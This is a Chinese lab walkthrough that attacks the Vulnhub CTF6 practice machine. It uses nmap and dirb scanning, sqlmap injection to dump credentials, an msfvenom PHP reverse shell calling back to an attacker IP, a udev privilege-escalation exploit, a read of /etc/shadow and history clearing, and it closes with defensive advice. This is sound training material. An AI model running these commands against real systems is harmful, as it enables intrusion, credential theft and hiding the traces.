Kali Linux下Vulnhub-CTF6靶机渗透实战:从信息收集到udev提权完整流程

张开发
2026/4/14 18:44:25 15 分钟阅读

分享文章

Kali Linux下Vulnhub-CTF6靶机渗透实战:从信息收集到udev提权完整流程
Kali Linux实战Vulnhub-CTF6靶机渗透全流程解析在网络安全领域靶机渗透测试是提升实战能力的重要途径。Vulnhub作为知名的漏洞演练平台提供了大量精心设计的靶机环境其中CTF6靶机因其典型的多层安全漏洞而成为初学者理想的练手对象。本文将完整呈现从信息收集到最终提权的全流程特别适合刚接触CTF比赛的网络安全爱好者。不同于简单的工具罗列我们将深入每个环节的技术原理和操作逻辑帮助读者建立系统化的渗透思维。1. 环境准备与信息收集渗透测试的第一步永远是充分的信息收集。在Kali Linux环境下我们首先需要确认靶机的网络位置和基础服务情况。netdiscover -r 192.168.10.0/24这个简单的ARP扫描命令能快速定位同一局域网内的活跃主机。发现靶机IP后更深入的端口扫描必不可少nmap -A -T4 -p- 192.168.10.40参数说明-A启用操作系统和版本检测-T4设置扫描速度为4级共6级-p-扫描所有65535个端口扫描结果显示靶机开放了80端口表明存在Web服务。此时应使用目录爆破工具枚举潜在的可访问路径dirb http://192.168.10.40 -X .php,.txt,.zip关键发现/admin/ - 后台管理入口/doc/ - 文档目录包含可下载的压缩包/sql/ - 疑似数据库相关文件/phpmyadmin/ - 数据库管理界面2. Web应用漏洞挖掘2.1 SQL注入漏洞利用在浏览网站时发现文章详情页URL包含id参数测试发现可能存在SQL注入sqlmap -u http://192.168.10.40/?id1 --risk3 --level5 --dbs成功获取数据库信息后进一步提取用户凭证sqlmap -u http://192.168.10.40/?id1 -D cms -T user --dump获取的敏感信息用户名密码哈希admin5f4dcc3b5aa765d61d8327deb882cf99通过简单的MD5解密获得明文密码adminpass成功登录后台管理系统。2.2 文件上传漏洞利用后台的Add Event功能存在未过滤的文件上传漏洞。我们使用msfvenom生成PHP反向shellmsfvenom -p php/meterpreter/reverse_tcp LHOST192.168.10.73 LPORT4444 -f raw shell.php同时启动Metasploit监听msfconsole -q -x use exploit/multi/handler; set PAYLOAD php/meterpreter/reverse_tcp; set LHOST 192.168.10.73; set LPORT 4444; exploit上传恶意文件后通过访问上传路径成功获取meterpreter会话。3. 内网渗透与权限提升3.1 初始立足点巩固获取初始shell后首先升级为完全交互式终端python -c import pty; pty.spawn(/bin/bash)随后进行基础信息收集uname -a cat /etc/passwd find / -perm -4000 2/dev/null系统关键信息内核版本2.6.32存在SUID程序/bin/mount, /bin/ping3.2 内核漏洞提权针对老旧的2.6内核udev提权是可靠选择。首先在Kali中定位漏洞利用代码searchsploit udev将利用代码上传至靶机并执行chmod x 8478.sh ./8478.sh $(ps -ef | grep udev | grep -v grep | awk {print $2})成功获取root权限后最后的任务是收集证据和清理痕迹cat /etc/shadow history -c rm -f /tmp/8478.sh4. 渗透测试的防御思考完成整个渗透流程后值得反思每个漏洞的防御方案SQL注入防御使用参数化查询实施最小权限原则定期更新Web应用框架文件上传防护严格验证文件类型和内容将上传文件存储在非Web可访问目录重命名上传文件系统加固建议及时更新操作系统内核移除不必要的SUID权限实施严格的用户权限分离在实际渗透测试项目中每个步骤都需要详细记录包括使用的工具和命令获取的敏感信息遇到的障碍和解决方案漏洞的严重程度评估

更多文章